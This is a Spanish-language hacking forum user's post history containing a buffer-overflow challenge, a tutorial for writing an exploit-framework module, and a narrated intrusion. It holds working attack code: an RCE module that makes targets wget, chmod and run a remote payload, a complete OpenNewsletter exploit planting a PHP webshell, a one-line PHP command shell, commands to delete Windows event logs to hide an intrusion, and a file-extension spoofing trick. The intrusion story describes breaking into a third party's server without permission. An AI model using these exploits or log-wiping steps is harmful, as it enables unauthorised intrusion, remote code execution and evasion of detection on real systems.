Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - q3rv0

#41
Wargames y retos / Reto Exploiting / Level [very easy]
Febrero 22, 2015, 06:07:31 AM
Lograr que el binario arroje el mensaje "You fucked me!".

Enviar exploit por inbox.

Código: c
#include <stdio.h>

int main(int argc, char **argv){
    int fuckme=66;
    char buffer[100];
    gets(buffer);
    if(fuckme==0x10245644){
        printf("You fucked me!");
}
    return 0;

}
#42
Si es cierto...aplausos!, despues hay cada uno subestimando el poder de este tipo de vectores, mientras mas conozco a JS mas respeto a los XSS.
#43
Off Topic / Re:¿Quieres ganar un VPS? Participa!
Febrero 13, 2015, 10:57:53 PM
[Q]3rV[0] 83

PD: blackdrake me cago el numero.
#44
Bugs y Exploits / Programa tu modulo para Frameshock
Febrero 08, 2015, 05:30:13 PM

Recientemente y de la mano de mi amigo hdbreaker salio a la luz un nuevo framework de explotacion llamado Frameshock, el cual promete ser una herramienta que a futuro, llegue a competir con el imponente Metasploit. Lo mejor de esta tool es que esta basada completamente en python y el desarrollo de exploits, auxiliares, etc se hace tremendamente sencillo debido a la manera en que trata los modulos.

En fin, basta de chicharas y vamos a evocarnos a lo que el titulo llama. Antes de proseguir con el resto del tutorial, se tiene en cuenta que el lector cuenta con conocimientos de POO en el lenguaje python.

*** ADVERTENCIA *** Si estas leyendo esto y todavía no te encontras familiarizado con el framework, podes ver el siguiente enlace No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Estructura de los módulos

La estructura de los módulos es la siguiente, y lo único a respetar durante el desarrollo.

Código: python
# -*- coding : utf-8 -*-
import sys
sys.path.append('.')
from config import config
from tabulate import tabulate

class module(config):

    def __init__(self):
        self.config=config()
        self.cur = self.config.getCursor()
        self.con = self.config.getCon()
        self.targets=[]
        self.preExecution()

    def preExecution(self):
        while 1:
            ################Aca se definen las opciones y se cargan los argumentos################



    def exploit(self):
        if len(self.targets)>0:
            for target in self.targets:
                print "Attack "+target[1]
                ################Aca va el exploit################
        else:
            print "No hay targets"

################Aca va el metodo que contiene el exploit################
    def test(self):
        print "Attack Test"
########################################################################

##########Se inicia el modulo###########
start=module()
########################################


Como se ve:


   
Se importan módulos necesarios como sys para agregar el dir base al PATH de python: sys.path.append('.')

    Se importa el modulo config el cual contiene ciertos métodos que nos proveerán de los datos que configuramos con la opción config en el prompt de frameshock. Además es necesario para trabajar con shodan y la db si es que lo necesitamos.

    Se importa tabulate, el cual lo usaremos para mostrar informacion en forma de tabla como por ejemplo los targets seteados.

La clase module()

La clase module contiene tres métodos, en __init__:

    Se inicializa el objeto config y se llama a dos métodos dentro de config

    getCursor()
    getCon()



Necesarios para trabajar con la db sqlite3, como dije anteriormente nos servirán para hacer uso de shodan, pero en este apartado no se hará referencia al mismo, aunque de igual manera se mencionaran.

    Se crea una lista vacía self.targets=[] que almacenara los objetivos que seleccionemos en modo manual.

    Por ultimo se llama al método preExecution.


preExecution()


Acá indicaremos la opciones que contendrá el modulo y cargaremos los argumentos que son pasados a través de esas opciones, tales como el target objetivo, la opción de arranque del modulo, etc. Eso va en los parámetros que necesite recibir nuestro modulo, si desean también pueden incluir una opción para desplegar información acerca del mismo, o datos del autor.
Comencemos! y a partir de acá, siéntanse libres de codear a su antojo, para nuestro ejemplo voy a portar como modulo de Frameshock un simple script que explota un rce.

Código: python
#!/usr/bin/python

import urllib2
import sys

def rce(target):
    while 1:
        command=raw_input("$> ")
        w=urllib2.urlopen(target+"www.google.com|"+command)
        print w.read()

rce(sys.argv[1])


let's go!

Arranquemos por definir la opción help. Por comodidad respecto a la sintaxis se optara por utilizar la misma que msf, pero no es algo indispensable.


Ahora continuemos con el resto de las opciones necesarias para nuestro modulo.


Sencillo no?, no hace falta explicar mucho, el código habla por si solo.

Para obtener el objetivo, hacemos un split a la cadena set target, tomamos el indice 2 y luego hacemos un append para ingresar los datos dentro de self.targets.

Para desplegar los objetivos lo hacemos con tabulate, por cuestiones de estetica, lo dije antes y lo vuelvo a decir, SIÉNTANSE LIBRES!

Si la opción elegida es exploit invoca el metodo self.exploit() que lo trataremos en el siguiente paso.
                                                     
exploit()


Tenemos dos caminos, utilizar algún payload provisto por Frameshock, o bien realizar una conexión directa. Como el handler del framework no esta el divino botón optaremos por la primera. Definiremos el método que contendrá el exploit e importaremos las librerias necesarias.

Código: python
def rce(self, target):
        command="wget%20http://"+self.config.getUrlInjector()+"%20-O%20"+self.config.getInjectorName()+"%3Bchmod%20755%20"+self.config.getInjectorName()+"%3Bpython%20"+self.config.getInjectorName()
        urllib2.urlopen(target+"www.google.com%7C"+command)


Hagamos un párate y pongamos un par de cosas en remojo.

    self.config.getUrlInjector() : Retorna la url del payload que hemos seteado desde frameshock

    self.config.getInjectorName() : Nos devolverá el nombre del payload elegido.


Entonces el metodo rce() lo único que hace es descargar nuestro payload en el servidor remoto, darle permisos de ejecución y lanzarlo contra nuestro handler.

Código: python
command="wget http://"+self.config.getUrlInjector()+" -O "+self.config.getInjectorName()+";chmod 755 "+self.config.getInjectorName()+";python "+self.config.getInjectorName() 


Lo llamamos desde exploit() y nos disponemos a probar nuestro modulo, quedando de la siguiente manera.


Código: python
# -*- coding : utf-8 -*-
import sys
sys.path.append('.')
from config import config
from tabulate import tabulate
import urllib2

class module(config):

    def __init__(self):
        self.config=config()
        self.cur = self.config.getCursor()
        self.con = self.config.getCon()
        self.targets=[]
        self.preExecution()

    def preExecution(self):
        while 1:
            ################Aca se definen las opciones y se cargan los argumentos################
            opcion=raw_input("> ")

            if opcion=="help":
                print("set target <TARGET> -> Setea el target manualmente")
                print("exit -> Cierra el modulo")
                print("show targets -> Muestra los targets seteados")
                print("clear targets -> Elimina los targets")
                print("exploit -> Inicia el modulo de ataque")

            elif opcion.find("set target")!=-1:
                target=opcion.split(' ')[2]
                self.targets.append((0, target, "Modulo para explotar un RCE", "RCE"))

            elif opcion=="exit":
                exit(0)

            elif opcion=="show targets":
                if len(self.targets)>0:
                    print tabulate(self.targets, ["ID", "TARGET", "DESCRIPCION", "MODULO"], tablefmt="grid")
                else:
                    print "No hay targets seteados"

            elif opcion=="clear targets":
                self.targets=[]

            elif opcion=="exploit":
                self.exploit()


    def exploit(self):
        if len(self.targets)>0:
            for target in self.targets:
                print "Attack "+target[1]
                ################Aca va el exploit################
                self.rce(target[1])
        else:
            print "No hay targets"

################Aca va el metodo que contiene el exploit################
    def rce(self, target):
        command="wget%20http://"+self.config.getUrlInjector()+"%20-O%20"+self.config.getInjectorName()+"%3Bchmod%20755%20"+self.config.getInjectorName()+"%3Bpython%20"+self.config.getInjectorName()
        urllib2.urlopen(target+"www.google.com%7C"+command)
########################################################################

##########Se inicia el modulo###########
start=module()
########################################


Antes que nada, lo guardaremos en el directorio /FrameShock/Modules respetando la regla del nombre.

numero_nombremodulo.py

Por ejemplo:

Si tenemos los siguiente módulos (1_moduloprueba.py, 2_moduloprueba.py, 3_moduloprueba.py), Lo agregaremos como 4_rce.py.


Estamos listos para cargar nuestro modulo de prueba.


BOOM! explotado con exito el rce!

Cabe resaltar para terminar, que en el directorio  /FrameShock/ExampleModule contamos con un modulo de ejemplo para comenzar a programar desde ahí.

Código: python
# -*- coding: utf-8 -*-
import sys
sys.path.append('.')
from config import config
from tabulate import tabulate

class module(config):


####Init configuration####
    def __init__(self):
        self.config = config()
        self.cur = self.config.getCursor()
        self.con = self.config.getCon()
        self.targets=[]
        self.preExecution()
##########################

####User define information####
    def preExecution(self):
        while(True):
            option = raw_input("> ")
            if(option=="exit"):
                exit(0)

            if(option=="help"):

                print("set target URL:PORT --> Manual Target")
                print("clear targets       --> Show Targets in module")
                print("show targets        --> Clear Targets in module")
                print("use shodan          --> Targets from Shodan Results")
                print("exploit             --> Start atack")
                print("exit                --> Close Module")

            if(option.find("set target")>-1):
                data = option.split(" ")
                data = data[2].split(":");
                target = data[0]
                port = data[1]
                self.targets.append((0,target,port,"Manual","null"))

            if(option.find("use shodan")>-1):
                self.targets=self.config.getTargets();

            if(option=="clear targets"):
                self.targets=[]
                print("Clear Done")

            if(option=="show targets"):
                if(len(self.targets)!=0):
                        print tabulate(self.targets, ["id", "IP", "PORT", "Description", "Vulnerable Module"], tablefmt="grid")
                else:
                    print "No targets"

            if(option=="exploit"):
                self.exploit()
###################################

###Exploit c0de###
    def exploit(self):
        if(len(self.targets)!=0):
            for target in self.targets:
                ###YOUR EXPLOIT CODE HERE###
                print "Atack "+target[1]+":"+target[2]
        else:
            print "No targets found";

####def custom user functions (calleable from exploit())####
    def testFunctions(self):
        print "Atack test"
#############################################################

#####Init Module#####
start = module()
#####################


Saludos! y Happy Frameshock Hacking!

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#45
Muy buena.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#46
Off Topic / Re:Vídeos Cybercamp 2014
Diciembre 28, 2014, 05:16:15 PM
jajajaj prophet afloja los nervios. Buena charla chicos! ;)
#47
Dudas y pedidos generales / Re:Comando en Shell
Diciembre 21, 2014, 07:55:16 PM
Podes hacer un

Código: php
echo "contenido" > fichero


O directamente descargarlo con wget, curl o GET.

Subirlo mediante el upload de la webshell si es que tiene, etc.

Existen mucha maneras,  vas a tener que leer mas sobre bash.
#48
Bugs y Exploits / Del Spam a La Intrusion
Diciembre 17, 2014, 09:52:39 PM
Prologo

Hacia rato que no le echaba una ojeada al spam de mi gmail y esta vez tenia el basurin lleno, es que muchas veces uno puede encontrarse envuelto en alguna aventurita que te alegre el dia o no, en este caso mas que nada fue un poco de diversion. En fin, mientras leia los subject de los correos me pare en uno que decia: "Your account has ben blocked".



Era un mail "supuestamente" eviando desde blockchain, pero como no tenia idea que servicio estaba prestando al publico me fui directamente a la url del sitio.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



La verdad es que nunca me habia logueado en la aplicacion (segun recuerdo), es mas no tengo una cuenta referenciada a este tipo de servicios en general. Al instante y era obvio deduje que se trataba de un caso de phishing, asi que sin dudarlo segui el enlace acortado por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para afirmar lo antes predicho.



Por desgracia el path del fake no se encontraba, asi que por curiosidad quize seguir por mi parte para cersiorarme de si habia sido movido a otra ruta o es mas, para ver si lograba captar otros tipos de fraudes montados en el mismo hosting, pero...como hiba a saber eso? ...

Un poco de Google Hacking

Lo primero que hice fue arrancar a jugar con goo*, buscando diversas extenciones de ficheros, hasta que di con algo interesante.

Código: text
site:klsicci.com.my ext:txt




Archivos de configuracion en texto plano!, lamentablemente al pedirlos no se encontraban mas en la ruta, pero si google los tenia, habria que negociar con el.

Código: text
cache:http://klsicci.com.my/admintest1/config/klsiccic4.txt




Anque las credenciales podian ser viejas o con suerte, quizas, seguian en uso, no perdia nada con probar.

Trate de establer una conexion por mysql pero me nego el acceso, lo mas probable es que solo admitia conexiones desde localhost o bien mediante una lista de ips habilitadas.

Ya que conocia el user a travez del path /home/klsiccic/ informacion que habia obtenido de los ficheros cacheados, intente loguearme por ftp mediante el password de la db (Me he encontrado con muchos hostings que usan pass global para diferentes servicios), pero esta vez el ftp me reboto.

Todavia faltaba mucho por analizar, asi que segui probando con goog*.

Queria un acceso rapido, entonces pense que podria estar cacheada la webshell del atacante, si es que realmente habia usado una para obtener acceso.

Luego de persistir con un par de strings

Código: text
site:klsicci.com.my && inurl:shell




Di con el objetivo, pero nuevamente el 404.

Por un lado me incitaba a seguir buscando ya que tenia el title de la webshell que podria ser la herramienta del spammer. Hasta ahora no queria cersiorarme por completo hasta estar seguro de que fuera el autor del echo, tal vez la webshell podria pertenecer a otro intruder que nada tenia que ver con el scam.

Largue otra busqueda.

Código: text
site:klsicci.com.my && intitle:"=[ 1n73ct10n privat shell ]="




Y esta vez tenia un lindo historial, pero todos apuntaban a la misma url fallida.

Aprovechando la lista obtenida, encuentro entre los path que se le pasaban como parametro a la ex shell, un dir de nombre /opennews.





Opennewsletter es una aplicacion open-source para administrar listas de mails.

OpenBUGletter


Ravisando en exploit-db encuentro un reporte de multiples vulnerabilidades para las versiones <=2.*. Una de ellas y por cierto la mas critica hablaba de un RCE en la plataforma.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para ser aprovechado requieria de acceso a la administracion, investigando un poco en el source de opennews el cual lo obtuve de la siguiente web.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Veo que las credenciales del admin son tomadas desde config.php y el user, pass por defecto es admin:admin.



Por suerte el fichero no habia sido retocado y pude obtener acceso.



Por razones que desconocia el exploit no lograba darme una shell en el sistema, asi que me puse a leer el codigo para ver donde se daba el bug, mirando en subscribers.php se puede ver como se abre el fichero data.dat y se ingresa el contenido de la variable $_POST['email] sin sanitizar.



En settings.php se permite renombrar el mismo a travez de la variable $_POST['db_file'] que al igual que la anterior no posee ningun tipo de filtro seguro.



Ahora que ya tenia una idea de como inyectar codigo, lo unico que quedaba era incrustar un payload en data.dat y este a su vez renombrarlo a *.php, mirando nuevamente el exploit me doy cuenta que para ingresar el codigo hace una peticion a subscribe.php (fichero que no existe en esta version de opennews (2.5.1)), ademas del pasaje de parametros por GET.



Asi que decidi codear el mio propio para realizar la explotacion.

Código: python
#!/usr/bin/env python
# Description: Opennewsletter remote code execution exploit
# Version tested: 2.5.1
# Author: q3rv0

import urllib2
import urllib
import re

class opennews_exploit:

    def __init__(self, host):
        self.host=host
        cookies=urllib2.HTTPCookieProcessor()
        opener=urllib2.build_opener(cookies)
        urllib2.install_opener(opener)

    def postSend(self, parametros, path):
        self.headers={"User-Agent":"Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0"}
        self.parametros=urllib.urlencode(parametros)
        self.path=path
        self.post=urllib2.Request(self.host+self.path, self.parametros, headers=self.headers)
        return urllib2.urlopen(self.post)

    def getOldDbFile(self):
        self.get=urllib2.urlopen(self.host+"settings.php").read()
        self.name=re.findall("name=old_db_file value=([\w\.\-_]+)>", self.get)
        return self.name[0]

    def verifyShell(self, path):
        try:
            self.path=path
            self.code=urllib2.urlopen(self.host+self.path)
            return self.code.getcode()
        except:
            pass

target="http://pwnedhost.com/opennews/"
shell="shell.php"
user="admin"
passwd="admin"
admin_name="Your Name"
admin_email="[email protected]"
charset="UTF-8"
site_url="http://www.yourwebsite.com"
opennews_directory="/"
payload="<?php echo `$_POST[exec]`; ?>"

rce=opennews_exploit(target)

def get_shell(shell):
    print "[*] Obteniendo la shell :)\n"
    while True:
        command=raw_input("$~: ")
        print "\n"+rce.postSend({"exec":command}, shell).read()

if rce.verifyShell(shell)==200:
    get_shell(shell)

else:
    print "\n[*] Logueando...\n"
    rce.postSend({"username":user, "password":passwd}, "index.php?action=login")
    print "[*] Insertando el payload...\n"
    rce.postSend({"email":payload}, "subscribers.php?action=add")
    print "[*] Renombrando la shell...\n"
    rce.postSend({"admin_username":user, "admin_password":passwd, "admin_name":admin_name, "admin_email":admin_email, "charset":charset, "site_url":site_url, "opennewsletter_dir":opennews_directory, "old_db_file":rce.getOldDbFile(), "db_file":shell, "action":"update"}, "settings.php")
    get_shell(shell)


Cabe decir que el codigo del exploit es a modo de POC, solo fue testeado en la version 2.5.1, podria no funcionar en versiones anteriores.

run exploit



Listo! ya estaba dentro.



Buscando rastros del scam.

Luego de darle vueltas durante un rato, entrar y salir de directorios, darle a find como loco, no pude dar con el phishing, muchas veces las aventuras nunca terminan como uno quiere, eso terminaba por confirmarme de que el admin se habia encargado de el. Pero por otra parte encontre ciertos ficheros que comprometian aun mas al spammer/intruder.

El pequeño arsenal del defacer.



Ojala les haya gustado esta hackanecdota, saludos!

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#49
Para los que ayan accedido sin intervencion de MSF, una manera de eliminarlos es con el editor de registro

Código: dos
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Eventlog


Código: text
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Eventlog\Application

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Eventlog\Security

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Eventlog\System

Código: dos
reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Eventlog\Application
reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Eventlog\Security
reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Eventlog\System


De igual manera no me parece la mejor forma de eliminarlos, habria que indagar entre las subclaves buscando registros precisos de nuestra intrusion, vaciarlos del todo puede alertar mucho mas al admin.
#50
Dudas y pedidos generales / Re:Pregunta sobre php a BD
Diciembre 02, 2014, 11:10:17 PM
php se ejecuta en el server, no pueden ver el contenido, hace la prueba vos mismo.
#51
Noticias Informáticas / Re:Inseguridad CTF365
Noviembre 26, 2014, 09:04:05 PM
Segun comenta en un nuevo mail el admin, fueron PWNEADOS por un ex compañero de trabajo que habia dejado un backdoor, es eso o no se hacen cargo de las brechas que tuvieron o pueden seguir teniendo.

Adjunto el mail.

CitarHi q3rv0,

As you might already know, we had a small incident yesterday (November 25th). One of our former CTF365 team mates throw a list with usernames and their email address in the wild. Immediately we took action and reported to Romanian CERT (Computer Emergency Respond Team). They'll
start to dig in too as well as the Police (cybercrime dept).

We're sorry for this happening.

For your information, we have all passwords hashed, salted and we use Devise for authentication [1]. So except that there was the email addresses and usernames, nothing ugly and deep was compromised. Also as you know, we don't keep sensitive data on our
platform for this specific reason (in case of hacking not to find sensitive data). This is the reason we work with third party gateway payment system. More expensive for us, but a lot safer for you as a user.

Safety is our priority and always will be. This wasn't a security flow/breach or vulnerability, this was a vendetta from a former team mate whom we trusted.

As we speak, we're in process for a fresh install to all our infrastructure machines in order to avoid any possible backdoors left behind.

We recommend you to change your CTF365 account password once we'll be back, up and running.

Once again, sorry for the incident and if there is anything more you want to know, please do ask. I'd gladly answer to your questions.

Best regards,

[1] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Marius Corici
CEO for CTF365
#52
Pentesting / Re:Rootear Servidores VPS
Noviembre 23, 2014, 07:41:14 PM
Un par de cosas

El titulo mas bien tendria que ser "Elevar privilegios en servidores windows", por que da lo mismo que sea un  vps o un server compartido, etc. No todos los vps usan win.

Aca tenes error de sintaxis

Citar- El archivo es este : <? php system  $_GET[cmd]); ?>

seria
Código: php

<?php system($_GET['cmd']); ?>


Citar- Ya con el archivo subido van al link No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y les tiene que aparecer algo así nt autorythy/system nt. O cualquiera parecido si no les sale nada o les sale nt es porque no tiene vps la página web.

Sos NT AUTHORITY\SYSTEM y queres rootear?? si ya tenes los maximos privs.

Citarsi no les sale nada o les sale nt es porque no tiene vps la página web

O_O

Averigua sobre los temas que remarque y corregi el post por favor.

#53
Hacking / Re:Web con máquinas virtuales vulnerables.
Noviembre 22, 2014, 10:14:11 PM
Vulnhub rulz!
#54
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
cual es la maldita pass? ay esta instalado y no me deja entrar cual es el US y el pass

CitarEl mismo debera ser alojado en el host que se desea utilizar para realizar el ataque.

Una vez montada (instrucciones en el video de abajo) nos loguearemos con los siguientes datos por defecto.


User:q3rv0

Pass:ravenbot

lee bien el post
#55
Dudas y pedidos generales / Re:[DUDA] 3 Dudas Shell,SQLi
Noviembre 21, 2014, 08:38:44 PM
Para subir una shell precisas privilegios de FILE en la db y un path donde se pueda escribir primero

Para que queres dacakear rubias19?
#56
Wargames y retos / Underc0de Weekend #2 [Solucionario]
Noviembre 07, 2014, 07:05:50 PM
Durante todo el transcurso del reto semanal recibi un unico solucionario valido, el cual fue de mi amigo hdbreaker realizando correctamente los pasos que se llevan a cabo para concluir con un deafio de estas caracteristicas. Ademas se tomo el tiempo de explicar con detalle para las personas recien iniciadas en la seguridad.

Felicitaciones hd!

Nota importante

Recibi muchos pdfs en los que los participantes editaban el grub o montaban la imagen, y hasta algunos se quejaron por que les di como nula su solucion. El problema no estaba en las "pautas del reto", ya que se especifico que se trataba de un "boot2root"



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El problema radica en que esa gente jamaz habia jugado con un entorno virtual vulnerable de los tantos que hay en la web. Los invito a pasarse por las anteriores urls y asi encarar quien sabe, la proxima VM con otra perspectiva.

Solucionario: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#57
Wargames y retos / Re:Underc0de Weekend #2
Noviembre 06, 2014, 02:18:59 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Podrían dar alguna pista del reto?

Agradecido :D!

Trinity usa nmap
#58
Wargames y retos / Re:Underc0de Weekend #2
Noviembre 03, 2014, 11:03:42 AM
Sigo reciviendo solucionarios en los que editan el grub para entrar o montan la VM y acceden directamente al flag. NO ES LA SOLUCION!. La VM tiene servicios esperando muchachos! a pentestear! ponganle pilas. Donde se vio solucionar una VM asi?
#59
Wargames y retos / Re:Underc0de Weekend #2
Noviembre 01, 2014, 09:28:55 PM
Begin to play :)
#60
Podes usar el viejo truco del U+202E para "renombrarlo" a jpg o a la extencion que mas te guste

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta